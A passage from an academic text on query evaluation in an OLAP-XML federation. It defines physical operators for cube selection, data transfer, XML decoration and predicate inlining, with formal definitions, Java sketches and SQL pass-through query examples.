This semantics implies that an SQLXM query can be evaluated in four major steps. First, the cube is sliced as specified in the WHERE clause, possibly requiring decorations with XML data. Second, the cube is decorated for the level expressions in the SELECT and GROUP BY clauses, and then all dimensions, including the new ones, are rolled up to the levels specified in the GROUP BY clause. Third, the resulting cube is sliced according to the predicate in the HAVING clause, which may require additional decorations. Fourth, the top generalized projection projects away the decorations not required by the SELECT and GROUP BY clauses and gives the final result cube. The following section introduces a simplified representation of the query semantics.
SIMPLIFIED QUERY SEMANTICS

The query semantics have a great impact on the initial plan, as the semantics take the form of a logical query tree after an SQLXM query is parsed and analyzed. As the semantics indicate, duplicate decoration operators are generated when a level expression exists in several subclauses (e.g., the SELECT and the WHERE clauses). As the algebra shows, an operator takes an input federation and generates a new one. Thus, repeated operators can be detected by examining the input and output federations. The simplified query semantics can be constructed by removing the redundant operators that do not change the cube semantics. An operator that generates the same federation as the input federation is redundant. Thus, the plan without redundant operators is more compact and sometimes considerably smaller than the unsimplified version. This simplification benefits the performance
of the query processing. First, during the query optimization, the equivalent plans in the plan space can be enumerated much faster. Intuitively, this process can be thought of as the combination of operators: the fewer operators a plan has, the fewer combinations it results in. Second, smaller plans lead to less logical-to-physical conversion and cost-estimation time. Third, during evaluation, no duplicate data is retrieved, thereby leading to high reusability and, more importantly, less resource consumption (e.g., CPU, I/O, and storage). The simplified algebraic query representation is

σFed[predhaving](ΠFed[⊥p, ..., ⊥q, ls(⊥s), ..., lt(⊥t), leuΠ, ..., levΠ](ΔLEΠ,δ(σFed[predwhere](ΔLEσwhere(F)))))

Here, LEΠ,δ is a set of the decoration operators that are referenced by the SELECT and GROUP BY clauses only; that is, LEΠ,δ ⊆ LEΠ ∧ LEΠ,δ ∩ LEσwhere = ∅. Moreover, an instance of a decoration operator for a specific level expression is unique. In other words, when a virtual dimension for a level expression already exists in the federation, no decoration operator building the same dimension is needed again. Therefore, some of the decoration operators for the WHERE clause may build the virtual dimensions required by the SELECT and GROUP BY clauses as well; that is, LEΠ \ LEΠ,δ ⊆ LEσwhere. ΔLEσhaving is removed, because predicates on level expressions in the HAVING clause can be put in the WHERE clause. The original top generalized projection also is removed, because
Figure 6. The initial logical query plan
the HAVING clause does not change the cube schema. The simplified logical plan tree for the query in Figure 4 is shown in Figure 6, where only one decoration, δN[ANY]/Nl/P, exists below the federation selection, although it is referenced by two federation operators. The next section presents the physical algebra modeling the execution of federation queries.
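The following sketch illustrates the simplification rule that at most one decoration per level expression is kept in a plan, as in Figure 6 where δN[ANY]/Nl/P appears only once although two federation operators reference it; the types are illustrative, not the engine's classes.

import java.util.*;

// A sketch of removing redundant operators: a decoration whose virtual dimension
// already exists in the federation changes nothing and can be dropped.
public class PlanSimplifier {

    static final class Decoration {
        final String levelExpression;   // e.g. "Nation[ANY]/Nlink/Population"
        Decoration(String levelExpression) { this.levelExpression = levelExpression; }
    }

    /** Keeps only one decoration per level expression, preserving the first occurrence. */
    static List<Decoration> removeRedundant(List<Decoration> decorations) {
        Map<String, Decoration> unique = new LinkedHashMap<>();
        for (Decoration d : decorations) {
            unique.putIfAbsent(d.levelExpression, d);   // a later duplicate is redundant
        }
        return new ArrayList<>(unique.values());
    }

    public static void main(String[] args) {
        List<Decoration> plan = List.of(
                new Decoration("Nation[ANY]/Nlink/Population"),   // needed by WHERE
                new Decoration("Nation[ANY]/Nlink/Population"));  // requested again by GROUP BY
        System.out.println(removeRedundant(plan).size());          // 1
    }
}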
PHYSICAL ALGEBRA

As shown in Figure 5, an execution plan is produced by the query optimizer, which is used to guide the evaluator about when, where, and how the data retrieval and manipulation operations should be performed. An execution plan is an SQLXM query tree expressed in the physical algebra. The logical semantics of a query imply the main phases of the query evaluation, whereas a physical query tree is integrated with more detailed evaluation operations. In this section, we introduce the new physical algebra operators and the new semantics of the existing federation operators and show an example of a logical plan and its corresponding physical plan. The federation decorates OLAP data in the temporary component using the decoration XML data, which then enables selections and aggregations over the decorated temporary fact data. Therefore, the temporary component plays an important role at evaluation time. Before we describe the physical operators, we extend the original federation to an extended form, on which
our physical algebra is based. An extended federation is FTC,ext = (C, Links, X, T), where C is a cube, Links is a set of links between levels in C and documents in X, and T is a set of temporary tables.
Querying the OLAP Component

Cube operators include cube selection and cube generalized projection. They are used to model the OLAP component query, which is used to retrieve the cube data from the OLAP database. The cube selection operator σCube is much like a logical federation selection operator but has no references to level expressions in the predicates. A cube selection only affects the tuples in the fact table, thereby returning a cube with the same fact type and the same set of dimensions.
Example 1

Suppose the extended federation FTC,ext has the cube schema and the fact table in the example cube, TC. The cube selection operator σCube[Supplier = ‘S1’ OR Supplier = ‘S2’](FTC,ext) = F′TC,ext slices the cube so that only the data for the suppliers S1 and S2 in the fact table are retained. The resulting fact table is shown in Table 2.
Table 2. The fact table after selection

Quantity   ExtPrice   Supplier   Part   Order   Day
17         17954      S1         P3     11      2/12/1996
36         73638      S2         P5     18      5/2/1992
28         29983      S2         P4     42      30/3/1994

Definition 1. Cube Selection

Let Fext = (C, Links, X, T) be an extended federation, and let θ be a predicate over the set of levels {l1, ..., lk} and measures M1, ..., Mm. A cube selection is σCube[θ](Fext) = (C′, Links, X, T), where the cube is C′ = (N, D, F′), and the new fact table is F′ = {t′1, ..., t′l}. If ti = (e⊥1, ..., e⊥n, v1, ..., vm) ∈ F is an input fact tuple, then the corresponding fact tuple in the output fact table is t′i = ti if θ(ti) = true; otherwise, t′i = (e⊥1, ..., e⊥n, NULL, ..., NULL).

The cube generalized projection operator ΠCube rolls up the cube, aggregates measures over the specified levels, and at the same time removes unspecified dimensions and measures from a cube. Intuitively, it can be looked at as a SELECT statement with a GROUP BY clause in SQL. The difference between a cube and a federation generalized projection operator is that the first one does not involve external XML data or level expressions and is executed in the OLAP component. Intuitively, the levels specified as parameters to the operator become the new bottom levels of their dimensions, and all other dimensions are rolled up to the top level and removed. Each new measure value is calculated by applying the given aggregate function to the corresponding value for all tuples in the fact table containing old bottom values that roll up to the new bottom values. To ensure safe aggregation in the case of non-strict hierarchies (e.g., a dimension value has two parent values), we explicitly check for this in each dimension. If a roll-up along some dimension duplicates facts, we disallow further aggregation along that dimension by setting the aggregation type to c.
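A small Java sketch of the cube selection semantics of Definition 1, where fact tuples failing the predicate keep their dimension values but have their measures set to NULL; the types and the Example 1 predicate used in the demo are illustrative.

import java.util.*;
import java.util.function.Predicate;

// Tuples that fail the predicate keep their dimension values; measures become NULL.
public class CubeSelection {

    static final class FactTuple {
        final List<String> dimensionValues;
        final List<Double> measures;        // null models SQL NULL
        FactTuple(List<String> dims, List<Double> measures) {
            this.dimensionValues = dims;
            this.measures = measures;
        }
    }

    static List<FactTuple> select(List<FactTuple> factTable, Predicate<FactTuple> theta) {
        List<FactTuple> result = new ArrayList<>();
        for (FactTuple t : factTable) {
            if (theta.test(t)) {
                result.add(t);                                   // t'_i = t_i
            } else {                                             // measures become NULL
                result.add(new FactTuple(t.dimensionValues,
                        new ArrayList<>(Collections.nCopies(t.measures.size(), (Double) null))));
            }
        }
        return result;
    }

    public static void main(String[] args) {
        FactTuple t = new FactTuple(List.of("S1", "P3", "11", "2/12/1996"), List.of(17.0, 17954.0));
        // keep only suppliers S1 or S2, as in Example 1
        List<FactTuple> out = select(List.of(t),
                f -> f.dimensionValues.get(0).equals("S1") || f.dimensionValues.get(0).equals("S2"));
        System.out.println(out.get(0).measures);   // [17.0, 17954.0]
    }
}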
Example 2

Suppose the extended federation FTC,ext has the cube schema and the fact table in the example cube, TC. The cube generalized projection operator ΠCube[Supplier](FTC,ext) = F′TC,ext rolls up the cube to the level Supplier and calculates the Quantity per Supplier. After the projection, only the measure Quantity and the dimension Suppliers are retained, of which the bottom level is Supplier. The result fact table is shown in Table 3.
Table 3. The fact table after the cube generalized projection

Quantity   Supplier
17         S1
64         S2
2          S3
26         S4

Definition 2. Cube Generalized Projection

Let Fext = (C, Links, X, T) be an extended federation. Let li1, ..., lik be levels in C such that, at most, one level from each dimension occurs. The measures {Mj1, ..., Mjl} ⊆ {M1, ..., Mm} are kept in the cube, and fj1, ..., fjl are the given aggregate functions for the specified measures, such that ∀ D′g ∈ {Dg ⏐ Dg ∈ D ∧ ⊥g ∉ {li1, ..., lik}} ∀ fjh ∈ {fj1, ..., fjl} (fjh ∈ AggType(Mjh, D′g)), meaning that the specified aggregate functions are allowed to be applied. The cube generalized projection operator ΠCube over a cube C is then defined as: ΠCube[li1, ..., lik](Fext) = (C′, Links, X, T), where C′ = (N, D′, F′), D′ = {D′i1, ..., D′ik}, and D′ih = (L′Dih, E′Dih) for h ∈ {1, ..., k}. The new poset of levels in the remaining dimensions is L′Dih = (LS′ih, ⊑′ih, ⊤ih, lih), where LS′ih = {lihP ⏐ lihP ∈ LSih ∧ lih ⊑ih lihP}, and ⊑′ih = ⊑ih⏐LS′ih. Moreover, the poset of dimension values E′Dih is restricted to the values of the levels in LS′ih, where Lih is the set of dimension values of the level lih. The new fact table is F′ = {(e′⊥i1, ..., e′⊥ik, v′j1, ..., v′jl) ⏐ e′⊥ih ∈ Lih ∧ v′jh = fjh({v ⏐ (e⊥1, ..., e⊥n, v) ∈ Mjh ∧ (e′⊥i1, ..., e′⊥ik) ∈ Roll-up⊥i1(e⊥i1, li1) × ... × Roll-up⊥ik(e⊥ik, lik)})}. Furthermore, the aggregation type is set to c by AggType(Mj, D′ig) = c if ∃ (e⊥1, ..., e⊥n, vj) ∈ Mj ∃ e ∈ {e⊥1, ..., e⊥n} (‖Roll-up⊥g(e, lig)‖ > 1 ∧ vj ≠ NULL).
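The following sketch illustrates the roll-up-and-aggregate behaviour of the cube generalized projection with a SUM aggregate and a strictness check; it is a simplified model of Definition 2 under assumed helper names, not the engine's implementation.

import java.util.*;
import java.util.function.Function;

// Rolls bottom values up to a target level and sums the measure per group.
// A value rolling up to more than one parent signals a non-strict hierarchy,
// for which further aggregation would have to be disallowed (type c).
public class CubeProjection {

    static Map<String, Double> rollUpAndSum(Map<String, Double> measureByBottomValue,
                                            Function<String, Set<String>> rollUp) {
        Map<String, Double> result = new TreeMap<>();
        for (Map.Entry<String, Double> e : measureByBottomValue.entrySet()) {
            Set<String> parents = rollUp.apply(e.getKey());
            if (parents.size() > 1) {
                throw new IllegalStateException("non-strict hierarchy: aggregation type must be set to c");
            }
            for (String parent : parents) {
                result.merge(parent, e.getValue(), Double::sum);
            }
        }
        return result;
    }

    public static void main(String[] args) {
        // Rolling the per-Supplier quantities of Table 3 up to Nation using Table 4
        Map<String, Double> quantityBySupplier = Map.of("S1", 17.0, "S2", 64.0, "S3", 2.0, "S4", 26.0);
        Map<String, Set<String>> nationOf = Map.of("S1", Set.of("DK"), "S2", Set.of("DK"),
                                                   "S3", Set.of("CN"), "S4", Set.of("UK"));
        System.out.println(rollUpAndSum(quantityBySupplier, nationOf::get));
        // {CN=2.0, DK=81.0, UK=26.0}
    }
}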
Data Transfer Between Components

This section presents the definitions of fact-, dimension-, and XML-transfer operators. These
operators are used to transfer data between components. The fact-transfer operator transfers fact data from the OLAP to the temporary component, whereas a dimension-transfer operator only transfers dimension data. An XML-transfer operator connects the temporary and XML components, transferring the referenced XML data into a temporary table. In a physical execution plan, the fact-transfer operator is above the cube and below the federation operators. The resulting fact data from the cube operators are transferred to the temporary component through the fact-transfer operator. Thereafter, SQL operations (e.g., selections and joins) can be performed over the temporary fact table.
Definition 3. Fact Transfer

Let Fext = (C, Links, X, T) be an extended federation. The fact-transfer operator is φ(Fext) = (C, Links, X, T′), where T′ = T ∪ {RF}, and RF is the copy of the fact table in the temporary component.

When a non-bottom level is referred to by the federation operations in the temporary component, dimension values of the non-bottom level are required. The dimension-transfer operator ω is used at this time to load the dimension values for the given dimension levels into a table in the temporary component, which then can be used by federation selection and generalized projection operators.
Table 4. The temporary table for nation and supplier

Nation   Supplier
DK       S1
DK       S2
CN       S3
UK       S4
Example 3

A roll-up expression, Nation(Supplier), yields a dimension transfer. The two input parameters are Nation and Supplier. The dimension values for the two levels are loaded into a temporary table R1 shown in Table 4.
Definition 4. Dimension Transfer

Let Fext = (C, Links, X, T) be an extended federation, where the cube is C = (N, D, F). Let lix, liy be two levels in dimension Di, where lix ⊑i liy and lix ≠ liy. The dimension-transfer operator is defined as: ω[lix, liy](Fext) = (C, Links, X, T′), where T′ = T ∪ {R}, R = {(eix, eiy) ⏐ eix ∈ Lix ∧ eiy ∈ Liy ∧ eix ⊑Di eiy}. In the following, a temporary table for lix and liy created by a dimension-transfer operator is denoted as Rω[lix, liy]. The temporary table R1 in Example 3 can thus be denoted as Rω[Supplier, Nation]. According to the definition, the temporary component T′ has a new element, Rω[Supplier, Nation].

At query evaluation time, the XML data is needed in the temporary component to allow decoration, grouping, or selection on the cube according to the referenced level expressions. Intuitively, the XML-transfer operator connects the temporary component and the XML component, transferring the XML data into the temporary component. The input parameter is a level expression, which specifies the dimension values to be decorated, the corresponding decoration XML values selected by the relative XPath expression, and the link in the level expression. The operator yields a new table in the temporary component.
Definition 5. XML Transfer

Let Fext = (C, Links, X, T) be an extended federation, where C = (N, D, F). Let lz[SEM]/link/xp be a level expression, where lz ∈ Dz, link ∈ Links is a link from lz to X, and xp is an XPath expression
over X. The XML-transfer operator is defined as τlz[SEM]/link/xp(Fext) = (C, Links, X, T′), where T′ = T ∪ {R}. Here, R has the schema (lz, lxp) and is the temporary table containing the decorated dimension values and the decoration XML values found through the XML documents with the decoration semantics specified by the semantic modifier SEM. At evaluation time, the ALL semantics yield the temporary table having multiple rows with the same dimension value but different decoration values, whereas the table for the ANY semantics has only one row for a dimension value and an arbitrary decoration value linked through the level expression. Similarly, a dimension value decorated with the CONCAT semantics also takes up one row, but the decoration column is the concatenation of all the decoration values. In the following, R is denoted as Rτlz[SEM]/link/xp and is defined formally as Rτlz[SEM]/link/xp =

•  {(ez, exp) ⏐ ∀ (ez, s) ∈ link (∀ s′ ∈ xp(s) (exp = StrVal(s′)))}, if SEM = ALL.
•  {(ez, exp) ⏐ ∃ (ez, s) ∈ link (exp = StrVal(s′) for some s′ ∈ xp(s))}, if SEM = ANY.
•  {(ez, exp) ⏐ (ez, s) ∈ link ∧ exp = Concat(StrVal(s1), ..., StrVal(sk)) ∧ si ∈ Sez}, where Sez = {s ⏐ ∀ (e, s′) ∈ link (s ∈ xp(s′))}, for each ez ∈ Lz, if SEM = CONCAT.
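A sketch of how the three decoration semantics could materialize the (ez, exp) rows of Definition 5, given the decoration values already found through the link and the XPath expression; the method and type names are illustrative.

import java.util.*;

// Builds the temporary-table rows for the ALL, ANY, and CONCAT semantics.
public class DecorationSemantics {

    enum Sem { ALL, ANY, CONCAT }

    static List<String[]> rows(Map<String, List<String>> decorationsByDimValue, Sem sem) {
        List<String[]> table = new ArrayList<>();
        for (Map.Entry<String, List<String>> e : decorationsByDimValue.entrySet()) {
            List<String> values = e.getValue();
            switch (sem) {
                case ALL:                              // one row per decoration value
                    for (String v : values) table.add(new String[] { e.getKey(), v });
                    break;
                case ANY:                              // an arbitrary decoration value
                    table.add(new String[] { e.getKey(), values.get(0) });
                    break;
                case CONCAT:                           // all values concatenated into one
                    table.add(new String[] { e.getKey(), String.join(",", values) });
                    break;
            }
        }
        return table;
    }

    public static void main(String[] args) {
        Map<String, List<String>> found = Map.of("DK", List.of("5.3"), "CN", List.of("1264.5"));
        for (String[] row : rows(found, Sem.ANY)) {
            System.out.println(row[0] + " -> " + row[1]);
        }
    }
}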
Example 4

The operator τNation[ANY]/Nlink/Population(FTC,ext) generates F′TC,ext = (C, Links, X, T′), where T′ contains a new temporary table RτNation[ANY]/Nlink/Population. The table has two columns: one for the dimension values of Nation and the other for the decoration values Population. A decoration value is the string value of a Population node in the context of the XML nodes in Nlink. Each nation has one and only one population, as specified by the decoration semantics ANY. The result temporary table RτNation[ANY]/Nlink/Population using the XML data from Figure 2 is shown in Table 5.

Table 5. The temporary table for nation and population

Nation   Population
DK       5.3
CN       1264.5
UK       19.1
Querying the Temporary Component

This section presents the definitions of the operators that are performed in the temporary component. They are decoration, federation selection, and generalized projection operators, which allow the OLAP data to be decorated, selected, and grouped by the external XML data. The cube is decorated in the temporary component using the decoration operator δ. The operator generates a decoration dimension, which is derived according to the cube definition, namely that the fact table contains the bottom levels of all dimensions. Therefore, the new dimension has the unique top level, the middle decoration level, and the bottom level of the dimension containing the decorated level. Moreover, the new dimension has the same aggregation type as the referred dimension for each measure. Values of the levels are derived from a temporary decoration dimension table, which is composed of the decoration values and the bottom values of the referred dimension. Moreover, since the cube definition does not allow duplicate dimensions, no changes are made if an identical dimension already exists in the cube. At evaluation time of the decoration operator, the temporary table created by the XML-transfer operator and having the same input level expression is used. The new dimension follows the same decoration semantics specified by the level expression. Correct aggregations on such a decoration dimension are ensured by the federation generalized projection operator in Definition 8. A physical decoration operator may have more
than one child operator, which could be an XML-transfer operator with the same level expression as the input parameter, thereby providing the XML data in a temporary table.

Example 5

The decoration operator for Nation[ANY]/Nlink/Population generates a decoration dimension containing the top level ⊤, the middle level Population, and the bottom level Supplier, which is the bottom level of the dimension having the starting level Nation. The dimension values are derived from the result of an SQL inner join on the temporary tables of Examples 3 and 4. The dimension hierarchy is strict, since a supplier in a nation only has one corresponding population number. Figure 7 shows the dimension hierarchy and the temporary dimension table.

Figure 7. The decoration dimension and the temporary decoration dimension table Supplier/Population

Supplier   Population
S1         5.3
S2         5.3
S3         1264.5
S4         19.1

Definition 6. Decoration

Let Op1, ..., Opn be the child operators of a decoration operator δlz[SEM]/link/xp and (C, Links, X, T1), ..., (C, Links, X, Tn) be their output federations, where C = (N, D, F). Let lz[SEM]/link/xp be a level expression, where lz ∈ Dz, link ∈ Links is a link from lz to X, and xp is an XPath expression over X. The physical decoration operator is defined as δlz[SEM]/link/xp(Fext) = (C′, Links, X, T′), where Fext
= (C, Links, X, T) is the input, and T = T1 ∪ ... ∪ Tn is the union of the temporary tables from the child operators. In the output federation, T′ = T ∪ {RDn+1}, where RDn+1 is a temporary decoration dimension table holding the dimension values of the bottom level ⊥z and the XML level lxp; in addition, n is the number of the existing dimensions prior to the decoration. More precisely, suppose Rτlz[SEM]/link/xp ∈ T is a temporary table loaded by an XML-transfer operator and Rω[⊥z, lz] ∈ T is a temporary table loaded by a dimension-transfer operator; then, RDn+1 = Rτlz[SEM]/link/xp if lz = ⊥z, meaning that the table yielded by the XML-transfer already contains the required data and can be used directly. Otherwise, RDn+1 = π⊥z, lxp(Rω[⊥z, lz] ⋈ Rτlz[SEM]/link/xp) if ⊥z ⊑z lz and ⊥z ≠ lz, where π is the regular SQL projection, and ⋈ is the natural join. The resulting cube is given by C′ = (N, D′, F), where D′ = {D1, ..., Dn} ∪ {Dn+1} and Dn+1 = (LDn+1, EDn+1). Here, LDn+1 = (LSn+1, ⊑n+1, ⊤n+1, ⊥n+1), where LSn+1 = {⊤n+1, lxp, ⊥n+1}, ⊑n+1 = {(⊥n+1, lxp), (lxp, ⊤n+1), (⊥n+1, ⊤n+1)}, and ⊥n+1 = ⊥z. The poset of dimension values is EDn+1 = ({ei, ej ⏐ (ei, ej) ∈ RDn+1} ∪ {⊤n+1}, ⊑Dn+1), where ⊑Dn+1 = {(e⊥n+1, exp) ⏐ (e1, e2) ∈ RDn+1 ∧ e⊥n+1 = e1 ∧ exp = e2} ∪ {(e⊥n+1, ⊤n+1) ⏐ (e1, e2) ∈ RDn+1 ∧ e⊥n+1 = e1} ∪ {(exp, ⊤n+1) ⏐ (e1, e2) ∈ RDn+1 ∧ exp = e2}. For each measure Mh in M, the aggregation type of Dn+1 is AggType(Mh, Dz).

Intuitively, the physical federation selection operator σFed is an SQL selection over the join of several tables, including the fact table, decoration dimension tables, and temporary dimension tables for non-bottom levels referenced by the predicate. Similar to the cube selection, the federation selection returns a cube with the same fact types and the same set of dimensions and only affects the tuples of the fact table in the temporary component. A federation selection operator may have several child operators (e.g., dimension-transfer and decoration operators) to provide the values required by the predicate. The temporary tables produced by the child operators are collected and will be used in the join.

Example 6

Suppose the temporary fact table in FTC,ext is the copy of the fact table in Table 1. For a federation selection operator over FTC,ext whose predicate references the level expression Nation[ANY]/Nlink/Population, the decoration values, Population, must be joined with the temporary fact table before the selection predicate can be evaluated.

Definition 7. Federation Selection

Let Op1, ..., Opn be the child operators of a federation selection operator and (C, Links, X, T1), ..., (C, Links, X, Tn) be their output federations, where C = (N, D, F). Let θ be a predicate over the levels in C. The federation selection operator is defined as σFed[θ](Fext) = (C′, Links, X, T′), where Fext = (C, Links, X, T) is the input, and T = T1 ∪ ... ∪ Tn is the union of the temporary tables from the child operators. In the output federation, T′ = T \ {RF} ∪ {R′F} means that the temporary fact table RF is replaced by R′F. The resulting cube is C′ = (N, D, F′), where the new fact table is F′ = {ti ⏐ ti ∈ R′F}. Suppose Sθ is the set of levels referenced by θ; then R′F = σθ(RF) if Sθ = {⊥1, ..., ⊥l}, meaning that the predicates only contain the bottom levels. Otherwise, if Sθ has roll-up or level expressions, that is, {lx(⊥x), ..., ly(⊥y)} ⊆ Sθ and {lu[SEMj]/linkj/xpj, ..., lv[SEMk]/linkk/xpk} ⊆ Sθ, then R′F = πRF.*(σθ(RF ⋈ Rω[⊥x, lx] ⋈ ... ⋈ Rω[⊥y, ly] ⋈ Rτlu[SEMj]/linkj/xpj ⋈ ... ⋈ Rτlv[SEMk]/linkk/xpk)).

Similar to the federation selection, the federation generalized projection operator ΠFed is also implemented as a SELECT statement over temporary tables. Specifically, a roll-up operation is a join between the fact table and the temporary table containing the bottom level and the target level, where the common bottom level is the key of the join. Likewise, showing the decoration values together with OLAP values in the result also can be seen as a roll-up from the bottom level to the decoration level of a decoration dimension. Finally, an SQL aggregation calculates the given aggregate functions of the measures over the grouped facts according to the SELECT and GROUP BY arguments. Note that when performing roll-up operations, correct aggregation must be ensured by detecting hierarchy strictness.
Inlining

An inlining operator first uses the ADO Recordset objects to load the decoration values from the temporary tables into main memory, rewrites the predicates, and then replaces all the occurrences of the original predicates with the new predicates. The pseudo-code in Figure 12 shows the transforming function for rewriting predicates. Here, the data type of the predicates is String as in Java. A new predicate can be constructed by connecting several subpredicates with the operator "+", which is similar to the binary string operator in Java. The input θi is a parameter of the inlining operator ι[θ1, ..., θn], and bo and the predicate operator po are as defined in Definition 9. The possible forms of θi are listed in Definition 9. Each form is handled with the appropriate procedure, which generally is performed in two steps: first, the required data for θi is retrieved, and then the new predicate θ′i is constructed for the respective form.
Figure 12. Transforming the predicates

String rewritePredicate(String θi)
1)  {
2)    declare the new predicate θ′i as an empty string;
3)    switch (the form of θi)
4)    {
5)    case 1:
6)      retrieve ez's in all the pairs (ez, exp) from the temporary table such that “exp po K” evaluates to true;
7)      construct θ′i according to Definition 9;
8)      break;
9)    case 2:
10)   case 3:
11)     retrieve all the (ez, exp) pairs in the temporary table;
12)     construct θ′i for the respective form;
13)     break;
14)   case 4:
15)     retrieve ezi and ewi in all the tuples (ezi, exp1i, ewi, exp2i) such that (ezi, exp1i, ewi, exp2i) ∈ Rτlz[SEM1]/link1/xp1 × Rτlw[SEM2]/link2/xp2 and “exp1i po exp2i” evaluates to true;
16)     construct θ′i according to Definition 9;
17)     break;
18)   case 5:
19)     θ′i = rewritePredicate(“lz[SEM]/link/xp = K1”) + “ OR ” + ... + “ OR ” + rewritePredicate(“lz[SEM]/link/xp = Kn”);
20)     break;
21)   case 6:
22)     θ′i = “NOT ” + rewritePredicate(θi1);
23)     break;
24)   case 7:
25)     θ′i = rewritePredicate(θi1) + “ po ” + rewritePredicate(θi2);
26)     break;
27)   }
28)   return θ′i;
    }
For form 1 of θi, where a constant is involved, the predicate can be evaluated partially on the temporary table, meaning that the decoration XML data is compared with the constant, and only the dimension values paired with the satisfying decoration values are retrieved. Similarly, a predicate in form 4 first can be evaluated partially on a Cartesian product of the two temporary tables, Rτlz[SEM1]/link1/xp1 and Rτlw[SEM2]/link2/xp2, before the new predicate is constructed. For forms 2 and 3, the predicates cannot be evaluated, and all the dimension values of lz and the decoration values must be retrieved in
order to construct the new predicate with the names of the involved level and measure, respectively. For the rest of the forms, the rewritePredicate function is called recursively to construct first the component predicates of θi.
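The following sketch illustrates the form-1 rewrite for a "<" comparison, using the Population data of Table 5. Since Definition 9 appears elsewhere in the article, the exact output syntax here is an assumption; the disjunction of equalities produced matches the rewritten predicate Nation=‘DK’ OR Nation=‘UK’ shown in Boxes 2 and 6.

import java.util.*;

// Rewrites "lz[SEM]/link/xp < K" into a predicate over the starting level only.
public class InliningForm1 {

    static String rewriteLessThan(String levelName, Map<String, Double> decorationByDimValue, double k) {
        List<String> satisfied = new ArrayList<>();
        for (Map.Entry<String, Double> e : decorationByDimValue.entrySet()) {
            if (e.getValue() < k) {                        // "exp po K" evaluates to true
                satisfied.add(levelName + "='" + e.getKey() + "'");
            }
        }
        // the empty-result fallback "1=0" is an assumption for illustration
        return satisfied.isEmpty() ? "1=0" : String.join(" OR ", satisfied);
    }

    public static void main(String[] args) {
        // Population data of Table 5, predicate Nation[ANY]/Nlink/Population < 30
        Map<String, Double> population = new LinkedHashMap<>();
        population.put("DK", 5.3);
        population.put("CN", 1264.5);
        population.put("UK", 19.1);
        System.out.println(rewriteLessThan("Nation", population, 30));
        // Nation='DK' OR Nation='UK'
    }
}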
Cube Selection and Cube Generalized Projection

The cube operators use the OLAP component queries to select and to aggregate the cube; in the current implementation, these queries use the abbreviated SQL SELECT syntax supported by MS Analysis Services. Although they are two different operators, the cube selection and generalized projection operators together construct only one entire OLAP query. That is, the selection operator generates the WHERE clause with its parameter as the argument predicate, whereas the projection operator forms the other clauses (e.g., the SELECT and GROUP BY clauses) with the specified levels and aggregate functions as arguments. Generally, the operators in the form ΠCube[L](σCube[θ](Fext)) construct the following query, where N is the name of the cube C in Fext = (C, Links, X, T).

SELECT    F(M), L
FROM      N
WHERE     θ
GROUP BY  L
The same query also is used for the operators in the form σCube[θ](ΠCube[L](Fext)). Note that the HAVING clause is not supported due to a limitation in Analysis Services. Therefore, the predicate θ only can reference basic measures. The selection on aggregated measures is performed in the temporary component by a federation selection (see the following), which is not a noticeably expensive alternative, because the fact tuples copied into the temporary component already are aggregated and reduced by the OLAP query. If no cube selection operator exists in the plan, the WHERE clause no longer is required;
otherwise, if several selection operators exist, the predicates are combined into one predicate. If no cube generalized projection operator exists in the plan, the SELECT clause selects everything, using a "*" argument. However, only one cube generalized projection operator can exist in a query plan, because during plan optimization the equivalent plans are pruned such that the plans having multiple cube generalized projection operators are removed, and only the plan with the top cube generalized projection operator is retained. The reason is that the top projection always aggregates the cube to the same levels, no matter how many cube generalized projections yielding lower-level aggregates exist below it, and intermediate cubes should be avoided to save execution time.
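The following Java sketch shows how the parameters of the two cube operators could be combined into the single OLAP query of the general form above; the builder and its argument names are illustrative, not the engine's actual code.

import java.util.List;

// Assembles SELECT F(M), L FROM N WHERE θ GROUP BY L from the operator parameters.
public class OlapQueryBuilder {

    static String buildOlapQuery(String cubeName, List<String> aggregates,
                                 List<String> levels, String predicate) {
        StringBuilder sql = new StringBuilder("SELECT ");
        if (aggregates.isEmpty() && levels.isEmpty()) {
            sql.append("*");                              // no projection operator in the plan
        } else {
            sql.append(String.join(", ", aggregates));
            if (!levels.isEmpty()) sql.append(", ").append(String.join(", ", levels));
        }
        sql.append(" FROM ").append(cubeName);
        if (predicate != null) sql.append(" WHERE ").append(predicate);   // no HAVING: not supported by AS
        if (!levels.isEmpty()) sql.append(" GROUP BY ").append(String.join(", ", levels));
        return sql.toString();
    }

    public static void main(String[] args) {
        System.out.println(buildOlapQuery("TC", List.of("SUM(Quantity)"),
                List.of("Brand", "Nation"), "Nation='DK' OR Nation='UK'"));
        // SELECT SUM(Quantity), Brand, Nation FROM TC WHERE Nation='DK' OR Nation='UK' GROUP BY Brand, Nation
    }
}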
Fact Transfer

The fact-transfer operator copies the fact data into the temporary component using a pass-through query, which is an SQL SELECT INTO statement extended by the MS Transact-SQL function OPENQUERY (Microsoft, 2002a), where one of the parameters is the query constructed for the cube operators described previously. Generally, the fact transfer over the cube operators is in the form φ(ΠCube[L](σCube[θ](Fext))), which leads to the following query, where OLAP_SVR is the OLAP component. Note that the outer SELECT statement contains a GROUP BY clause, and the SELECT clause repeats the arguments of the inner SELECT clause, F(M) and L (see Box 1).

As stated in the article (Microsoft, 2002a), because there is a limitation in Analysis Services that causes GROUP BY and DISTINCT queries to produce multiple rows that satisfy the grouping and/or distinct functions (instead of just one), it is necessary to reduce the tuples by coalescing the returned tuples from the OPENQUERY function in the temporary component. For example, in the following query, the result set of the inner OLAP query is a union of the results of the OLAP
Box 1.

SELECT    F(M), L
INTO      tmp_facts
FROM      OPENQUERY( OLAP_SVR,
          SELECT    F(M), L
          FROM      N
          WHERE     θ
          GROUP BY  L)
GROUP BY  L
Box 2.

SELECT    SUM(Quantity), Customer
INTO      tmp_facts
FROM      OPENQUERY( OLAP_SVR,
          SELECT    SUM(Quantity), Customer
          FROM      TC
          WHERE     Nation=‘DK’ OR Nation=‘UK’
          GROUP BY  Customer)
GROUP BY  Customer
queries using the predicates Nation=‘DK’ and Nation=‘UK’ in the WHERE clause individually; therefore, the outer query must perform an aggregation in the temporary component to coalesce the rows returned for the same grouping values (i.e., Customer) (see Box 2). Therefore, the general form of the constructed OLAP query guarantees the correctness of the aggregation. However, the temporary aggregation can be avoided, if the grouping values for the returned subsets are disjoint. For example, the predicates in the following query construct two disjoint sets of values for the grouping attributes Customer and Nation; therefore, the union of the result sets can be inserted directly into the temporary fact table (see Box 3).
